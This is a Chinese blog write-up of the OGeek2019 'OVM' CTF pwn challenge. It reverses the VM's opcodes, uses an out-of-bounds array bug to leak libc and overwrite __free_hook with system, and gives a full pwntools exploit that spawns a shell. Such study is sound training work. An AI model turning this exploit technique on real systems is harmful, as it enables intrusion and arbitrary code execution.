[OGeek2019 Final]OVM

最新推荐文章于 2023-08-06 21:43:46 发布
最新推荐文章于 2023-08-06 21:43:46 发布
阅读量3.8k 收藏 1
点赞数 3
分类专栏: ctf 文章标签: 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52878095/article/details/123603408
版权

静态分析

拿到题目后第一件事先检查程序的保护机制

image-20220319175948621

看到程序除了canary保护以为,其他保护都开了,丢到IDA里面静态分析,程序先是为comment参数分配了一块0x8c大小的内存,然后让我们输入指令起始位置和栈起始位置,然后将指令起始位置赋值给reg[13],将栈起始位置赋值给reg[15],而且指令的数量不能大于0x10000,然后就是需要我们一条一条输入指令,输入完毕后就读取指令并执行,最后会有一个向comment中写入数据然后调用sendcomment函数

image-20220319180604176

image-20220319181909521

然后我们分别看一下fetch() / execute() / sendcomment() 这三个函数

fetch()函数就是将指令取出来,然后将reg[15] + 1 去读取下一条指令

image-20220319183659334

execute()函数也是这里最重要的函数了,它实现了每一条指令的功能,该函数太长了,这里就直接把代码复制过来了

ssize_t __fastcall execute(int a1)
{
  ssize_t result; // rax
  unsigned __int8 src_2; // [rsp+18h] [rbp-8h]
  unsigned __int8 src_1; // [rsp+19h] [rbp-7h]
  unsigned __int8 dest; // [rsp+1Ah] [rbp-6h]
  int i; // [rsp+1Ch] [rbp-4h]

  dest = (a1 & 0xF0000u) >> 16;		// 将a1与上0xF0000然后右移16位赋值给dest
  src_1 = (unsigned __int16)(a1 & 0xF00) >> 8;	// 将a1与上0xF00然后右移8位赋值给src_1
  src_2 = a1 & 0xF;		// 将a1与上0xF然后赋值给src_2
  result = HIBYTE(a1);	// 取出操作码赋值给result
  if ( HIBYTE(a1) == 112 )
  {
    result = (ssize_t)reg;
    reg[dest] = reg[src_2] + reg[src_1];	// 加
    return result;
  }
  if ( HIBYTE(a1) > 0x70u )
  {
    if ( HIBYTE(a1) == 176 )
    {
      result = (ssize_t)reg;
      reg[dest] = reg[src_2] ^ reg[src_1];	// 异或
      return result;
    }
    if ( HIBYTE(a1) > 0xB0u )
    {
      if ( HIBYTE(a1) == 208 )
      {
        result = (ssize_t)reg;
        reg[dest] = (int)reg[src_1] >> reg[src_2];	// 右移
        return result;
      }
      if ( HIBYTE(a1) > 0xD0u )
      {
        if ( HIBYTE(a1) == 224 )
        {
          running = 0;
          if ( !reg[13] )
            return write(1, "EXIT\n", 5uLL);	// 退出
        }
        else if ( HIBYTE(a1) != 255 )
        {
          return result;
        }
        running = 0;
        for ( i = 0; i <= 15; ++i )
          printf("R%d: %X\n", (unsigned int)i, (unsigned int)reg[i]);
        result = write(1, "HALT\n", 5uLL);
      }
      else if ( HIBYTE(a1) == 192 )
      {
        result = (ssize_t)reg;
        reg[dest] = reg[src_1] << reg[src_2];	// 左移
      }
    }
    else
    {
      switch ( HIBYTE(a1) )
      {
        case 0x90u:
          result = (ssize_t)reg;
          reg[dest] = reg[src_2] & reg[src_1];	// 与
          break;
        case 0xA0u:
          result = (ssize_t)reg;
          reg[dest] = reg[src_2] | reg[src_1];	// 或
          break;
        case 0x80u:
          result = (ssize_t)reg;
          reg[dest] = reg[src_1] - reg[src_2];	// 减
          break;
      }
    }
  }
  else if ( HIBYTE(a1) == 48 )
  {
    result = (ssize_t)reg;
    reg[dest] = memory[reg[src_2]];		// mov reg, mem
  }
  else if ( HIBYTE(a1) > 0x30u )
  {
    switch ( HIBYTE(a1) )
    {
      case 0x50u:
        LODWORD(result) = reg[13];
        reg[13] = result + 1;
        result = (int)result;
        stack[(int)result] = reg[dest];		// 将数值放到stack[]数组中,即 push reg[dest]
        break;
      case 0x60u:
        --reg[13];
        result = (ssize_t)reg;
        reg[dest] = stack[reg[13]];		// 将stack[]数组中的数值让如reg[]数组中,即 pop reg[dest]
        break;
      case 0x40u:
        result = (ssize_t)memory;
        memory[reg[src_2]] = reg[dest];		// mov mem, reg
        break;
    }
  }
  else if ( HIBYTE(a1) == 16 )
  {
    result = (ssize_t)reg;
    reg[dest] = (unsigned __int8)a1;	// 将a1放到reg[dest]数组中
  }
  else if ( HIBYTE(a1) == 32 )
  {
    result = (ssize_t)reg;
    reg[dest] = (_BYTE)a1 == 0;		// 将0赋值给reg[dest]
  }
  return result;
}

大致指令如下

mov reg, op		0x10 : reg[dest] = op
mov reg, 0		0x20 : reg[dest] = 0
mov mem, reg    0x30 : reg[dest] = memory[reg[src2]]
mov reg, mem    0x40 : memory[reg[src2]] = reg[dest]
push reg    0x50 : stack[result] = reg[dest]
pop reg     0x60 : reg[dest] = stack[reg[13]]
add         0x70 : reg[dest] = reg[src2] + reg[src1]
sub         0x80 : reg[dest] = reg[src1] - reg[src2]
and         0x90 : reg[dest] = reg[src2] & reg[src1]
or          0xA0 : reg[dest] = reg[src2] | reg[src1]
^          	0xB0 : reg[dest] = reg[src2] ^ reg[src1]
left        0xC0 : reg[dest] = reg[src1] << reg[src2]
right       0xD0 : reg[dest] = reg[src1] >> reg[src2]
0xFF : (exit or print) if(reg[13] != 0) print oper

这里的两个mov没有对memory[]数组进行边界检查,可以越界写

sendcomment()函数就是把comment给free掉了

image-20220319191019809

我们查看 comment、reg、memory、stack 这些数据都是存放在bss段上的,所以在 memory 越界写的时候,是可以把 comment、reg、stack 内容改掉的

image-20220319191242371

image-20220319191254605

而且程序最后又把comment给free掉了,如果我们能把 __free_hook 改为 system ,然后在 comment 里面写入 /bin/sh ,那么 free(comment) 就可以做到 system("/bin/sh")

泄露地址

当我们输入的操作数是0xE0的时候会将寄存器里面的值打印出来,所以这里可以泄露地址

image-20220319192202382

首先我们需要把 __free_hook 地址泄露出来,然后找到libc的基址,我们可以随便将got表中的一个函数的地址放到memary[]数组中这样后面打印memary[]数组的时候就可以把函数真实地址打印出来了,这里我们选择了离memary[]数组最近的stderr,

image-20220319202117494

我们可以把stderr的地址放到memary[]数组中,这样就可把stderr的地址打印出来,由于数组只能四字节四字节存放,而64位程序下地址有8字节,所以我们得将stderr的低四位和高四位分别存放,然后拼接起来,首先计算一下目标stderr相对于memary[]数组是第几个

memary[] : 0x0202060

stderr : 0x0201FF8
( 0 x 0202060 − 0 x 0201 F F 8 ) / 4 = 26 (0x0202060 - 0x0201FF8) / 4 = 26 (0x02020600x0201FF8)/4=26

reg[0] = 26
reg[1] = reg[1] - reg[0]
reg[2] = memory[reg[1]]		# 低四字节
reg[0] = 25
reg[1] = 0
reg[1] = reg[1] - reg[0]
reg[3] = memory[reg[1]]		# 高四字节

这样我们就成功将stderr的地址写入了reg[]数组中,就可以leak了

image-20220319203614831

漏洞利用

我们有了 stderr 的地址之后,因为存放在reg[]数组中,所以我们可以计算stderr的地址和__free_hook的偏移,然后把__free_hook-8的地址写到 comment 中,然后修改 comment 为 system 的地址即修改 __free_hook 为 system 的地址,并且把 /bin/sh 写到 comment 中,这样后续 free(comment) 就可以执行 system("/bin/sh") 了

我们用gdb调试程序,查看stderr的got表偏移,利用程序基址加上偏移计算出stderr的got表真实地址

image-20220319204358239

image-20220319204451761

然后我们查看__free_hook的地址,减去stderr的真实地址,就可以算出__free_hook相对于stderr的偏移了

image-20220319204713981

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bnC9C6LU-1647696757991)(https://s2.loli.net/2022/03/19/iKC51sXwNPlRQ7n.png)]

这里我们依旧采用分两次高位、低位分别写入的方法,将__free_hook的地址拼接起来,由于这里reg[]数组数据每次只能操作两字节,所以__free_hook-8 即 0x10a0 采用 1 右移 3 字节加上 a 右移一字节的方法写到reg[4]中,然后再将偏移加上reg[2]中stderr的低四字节存放到reg[2]中,这样reg[2]和reg[3]拼接起来就是 __free_hook-8 的地址了

reg[4] = 0x10
reg[5] = 12
reg[4] = reg[4] << reg[5]
reg[5] = 0xa
reg[6] = 4
reg[5] = reg[5] << reg[6]
reg[4] = reg[4] + reg[5]
reg[2] = reg[4] + reg[2]

image-20220319210338966

image-20220319210350673

然后我们只需要把 __free_hook 的地址写到comment即可,这里我们算一下comment相对于memary[]数组的位置

menary[] : 0x0202060

comment : 0x0202040
( 0 x 0202060 − 0 x 0202040 ) / 8 = 8 (0x0202060 - 0x0202040) / 8 = 8 (0x02020600x0202040)/8=8

reg[4] = 8
reg[5] = 0
reg[5] = reg[5] - reg[4]
memory[reg[5]] = reg[2]
reg[4] = 7
reg[5] = 0
reg[5] = reg[5] - reg[4]
memary[reg[5]] = reg[3]
exit

还是老样子分低位高位写入,把__free_hook-8的地址写到comment上

image-20220319211555064

然后我们退出就可以,它就会把__free_hook-8的地址输出出来,我们把拿到的地址+8就可以得到__free_hook的真实地址吗,然后我们计算system函数的真实地址,然后再程序下面对comment进行写的操作的时候就可以写入 /bin/sh + p64(sys_addr) 写到 __free_hook-8 里面了,这时候__free_hook 就被我们写成了 system 函数

image-20220319211823391

image-20220319212251741

image-20220319212339483

然后程序最后执行 free(comment) 就相当于执行了 system("/bin/sh")

EXP编写

由于它的操作指令和操作数,是通过这个运算得到的,所以我们可以将我们想要的操作指令转换为数据输入

image-20220319212622378

我们逆过来计算

image-20220319212636079

完整exp:

from pwn import *
from LibcSearcher import *
sh = process("./pwn")
# sh = remote("node4.buuoj.cn", 29921)
# context.log_level = 'debug'
'''
0x10 : reg[dest] = op
0x20 : reg[dest] = 0
mov mem, reg    0x30 : reg[dest] = memory[reg[src2]]
mov reg, mem    0x40 : memory[reg[src2]] = reg[dest]
push reg    0x50 : stack[result] = reg[dest]
pop reg     0x60 : reg[dest] = stack[reg[13]]
add         0x70 : reg[dest] = reg[src2] + reg[src1]
sub         0x80 : reg[dest] = reg[src1] - reg[src2]
and         0x90 : reg[dest] = reg[src2] & reg[src1]
or          0xA0 : reg[dest] = reg[src2] | reg[src1]
^          0xB0 : reg[dest] = reg[src2] ^ reg[src1]
left        0xC0 : reg[dest] = reg[src1] << reg[src2]
right       0xD0 : reg[dest] = reg[src1] >> reg[src2]
0xFF : (exit or print) if(reg[13] != 0) print oper
'''

def send_code(opcode, dest, src1, src2):
    code = (opcode << 24) + (dest << 16) + (src1 << 8) + src2
    print(hex(code))
    return str(code)

# gdb.attach(sh, 'b *$rebase(0xC4A)')
sh.sendlineafter("PC: ", '0')
sh.sendlineafter("SP: ", '1')
sh.sendlineafter("CODE SIZE: ", "24")
sh.recvuntil("CODE: ")
# gdb.attach(sh, 'b *$rebase(0x0D4B)')

sh.sendline(send_code(0x10, 0, 0, 26))
sh.sendline(send_code(0x80, 1, 1, 0))
sh.sendline(send_code(0x30, 2, 0, 1))
sh.sendline(send_code(0x10, 0, 0, 25))
sh.sendline(send_code(0x10, 1, 0, 0))
sh.sendline(send_code(0x80, 1, 1, 0))
sh.sendline(send_code(0x30, 3, 0, 1))


sh.sendline(send_code(0x10, 4, 0, 0x10))
sh.sendline(send_code(0x10, 5, 0, 8))
sh.sendline(send_code(0xC0, 4, 4, 5))
sh.sendline(send_code(0x10, 5, 0, 0xa))
sh.sendline(send_code(0x10, 6, 0, 4))
sh.sendline(send_code(0xC0, 5, 5, 6))
sh.sendline(send_code(0x70, 4, 4, 5))
sh.sendline(send_code(0x70, 2, 4, 2))


sh.sendline(send_code(0x10, 4, 0, 8))
sh.sendline(send_code(0x10, 5, 0, 0))
sh.sendline(send_code(0x80, 5, 5, 4))
sh.sendline(send_code(0x40, 2, 0, 5))
sh.sendline(send_code(0x10, 4, 0, 7))
sh.sendline(send_code(0x10, 5, 0, 0))
sh.sendline(send_code(0x80, 5, 5, 4))
sh.sendline(send_code(0x40, 3, 0, 5))
sh.sendline(send_code(0xE0, 0, 0, 0))

# gdb.attach(sh)

sh.recvuntil("R2: ")
low = int(sh.recvuntil("\n"), 16) + 8
print("[*]" + hex(low))
sh.recvuntil("R3: ")
high = int(sh.recvuntil("\n"), 16)
free_hook_addr = (high << 32) + low
print("[*] __free_hook : " + hex(free_hook_addr))
libc = LibcSearcher('__free_hook', free_hook_addr)
libc_base = free_hook_addr - libc.dump("__free_hook")
sys_addr = libc_base + libc.dump("system")

# libc_base = free_hook_addr - 0x3c67a8
# sys_offset = [0x03f650, 0x03f650, 0x03f630,	0x03f630, 0x03f620, 0x045390, 0x0453a0, 0x0453a0, 0x045390]
# sys_addr = libc_base + sys_offset[6]

payload = b"/bin/sh\x00" + p64(sys_addr)
sh.send(payload)

# gdb.attach(sh)


sh. interactive()

拿到shell

image-20220319212839811
myblog

BOYcc1
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OGeek_2019_Final OVM题解
lifanxin的博客
05-24 749
WP程序分析程序主逻辑分析虚拟机指令分析利用思路exp总结 程序分析   本题目是一道典型的虚拟机题目,通过这道题目,我们可以学习一下VM pwn题的分析技巧和利用思路。   该题目程序和远程环境可以在buuoj上找到,下面老规矩先检查下程序信息,64位小端程序,没有开启栈保护。   做虚拟机的pwn题,我们可以分两大步骤进行,首先先分析一下这个程序是如何实现虚拟机功能的,也就是程序自身的大逻辑,然后我们再详细分析程序虚拟出来的指令,分析指令的过程可能会比较耗时,需要耐心。 程序主逻辑分析   我们首先来
[OGeek2019 Final]OVM(简易虚拟机逃逸)
m0_51251108的博客
10-16 720
vmpwn入门
[OGeek2019 Final]OVM(简易虚拟机逃逸)
seaaseesa的博客
05-01 1139
[OGeek2019 Final]OVM 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,是一个虚拟机 其中,这里这条mov reg的指令比较重要 还有这里mov memory的指令也比较重要 这里两处,都存在下标越界,通过查看汇编指令可知,memory和reg都是有符号的数据数组。 因此,利用reg[out] = memory[-X],可以向上越界,将数...
OGeek2019_babyrop
z1r0的博客
12-04 262
OGeek2019_babyrop 查看保护 取了一个随机数,接着跟进一下804871f 匹配用户输入的是否与随机数相等。这里使用\x00来绕过,返回了一个v5,v5没有给值,我们再接着往下看 这个函数内a1超过0xE7就会溢出过ebp,所以我们让a1为0xff,就可以溢出很长的空间,这里的a1也就是上面的v5,所以我们肯定要控制v5,看一下v5和buf的关系 804871f这个函数内可以让buf输入0x20个字符,v5和buf距离为7,这样我们就可以控制v5了。接下来rop就好了 from pw
ovm7690.rar_OVm7690
09-23
ovm7690,video tracking device
ovm reference
04-05
很详细的介绍了ovm各个模块的用法。对初学者是很好的入门书
ovm_register-1.0beta7.tar.gz_ovm
09-22
OVM register kit used to develop verification IPs
OVM cookbook
07-26
更详细地介绍了ovm的具体使用,里面有一些例子可作参考。
OVM User Guide
07-26
介绍了OVM的基本概念,用法,环境结构等
OGEEK2019 babyrop wp
qq_43409582的博客
03-19 2195
这题就是需要绕过两个验证,之后就是常规rop了。 这里有个比较,你输入的值与一个随机数进行比较,这个验证不过会直接推出程序。那我们就让他取一个极值,让他无论是何值都能过。因为strlen这个函数遇到’\0’就会截止。所以我们就输入‘\x00’就好了。这样不论随机数是什么我们都会取<0。 这个地方的取值是之前那个函数的返回值,利用之前那个输入的地方把v5盖成一个很大的值以便之后做栈溢出的rop...
[OGeek2019 Final]OVM——详细入门VM pwn
fzucaicai的博客
08-06 878
仔细分析代码都可以发现,这些操作都没有对数组的下标进行检查,这样会导致什么后果呢,举个例子,如果有一个重要数据B存在数组array[10]的内存前面,如果不对数组的下标进行检查的话,那么我就可以构造array[-1]并输出,就可以得到B的内容了。也就是说,我们给程序输入一串指令,这个程序会有自己独特的,对代码的理解,并进行像分解成机器码那样,执行,而像寄存器,栈空间,存储空间都是程序自己设计的,而不是系统分配的。这两个条件判断语句的目的是确保在进行内存释放操作之前,所提供的指针和大小都是有效的。
软件如何画pcb螺丝孔_如何画函数图像(常见函数篇)——动态数学软件GeoGebra...
weixin_33397994的博客
01-13 435
在GeoGebra里,一输入表达式,函数图像瞬间出来。下面,我们来看看常见函数是如何输入的。分类普通函数例:f(x) = sin(2x),g(x) = x² + 2【直接输入“=”右边的式子即可】分别输入sin(2x) , x^2 + 2系数待定的函数【法一】输入表达式,再点“创建滑动条”例:f(x) = k x + b输入k x + b,再“创建滑动条”【法二】先创建滑动条,再输入表达式例:f(...
VMPWN
Amalllの博客
11-11 1027
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
CTF pwn题之虚拟机题型详解
lifanxin的博客
05-24 1460
虚拟机题型详解概述如何分析一个例子总结 概述   随着对pwn题的学习,慢慢开始接触VM虚拟机的pwn题了,刚开始做这种类型的题时会发现代码量比较大,略显复杂,复杂的部分主要是在用程序实现虚拟机指令那里。   其实这种题做法和普通pwn类似,也是寻找漏洞,复杂的地方在于需要我们去分析出虚拟机实现的指令,然后用这些指令操作进行漏洞利用。 如何分析   接下来介绍下如何分析,对于VM类型的pwn题,复杂的地方在于分析出该VM对应实现的指令,那么如何分析需要一定章法。这里需要简单知晓一些计算机组成原理和汇编语言的
VM pwn入门
weixin_44145820的博客
06-07 2044
VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
【八芒星计划】 VM PWN
carol2358的博客
09-01 470
这篇用来记录VM PWN 先申明本篇文章资料来源: https://blog.csdn.net/weixin_44145820/article/details/106600382 https://www.anquanke.com/post/id/208450#h2-1 https://xz.aliyun.com/t/6865 文章目录[OGeek2019 Final]OVM vm pwn最关键的就是逆向相关程序,理解每个指令的作用,漏洞大多数都是数组越界 先介绍一些基础的概念: 1.虚拟机保护技术 所谓
buuoj Pwn writeup 166-170
yongbaoii的博客
06-03 234
166 picoctf_2018_echo back 167 168 169 170
一道题目入门VMpwn
qq_40712959的博客
04-16 320
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
ovm candence
最新发布
10-21
OVM(Open Verification Methodology)是一种基于SystemVerilog的开放式验证方法学。它由Cadence公司推出,旨在提供一种灵活且可重用的验证框架,以提高验证工程师的效率和产品的质量。 OVM的核心理念是将验证环境...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值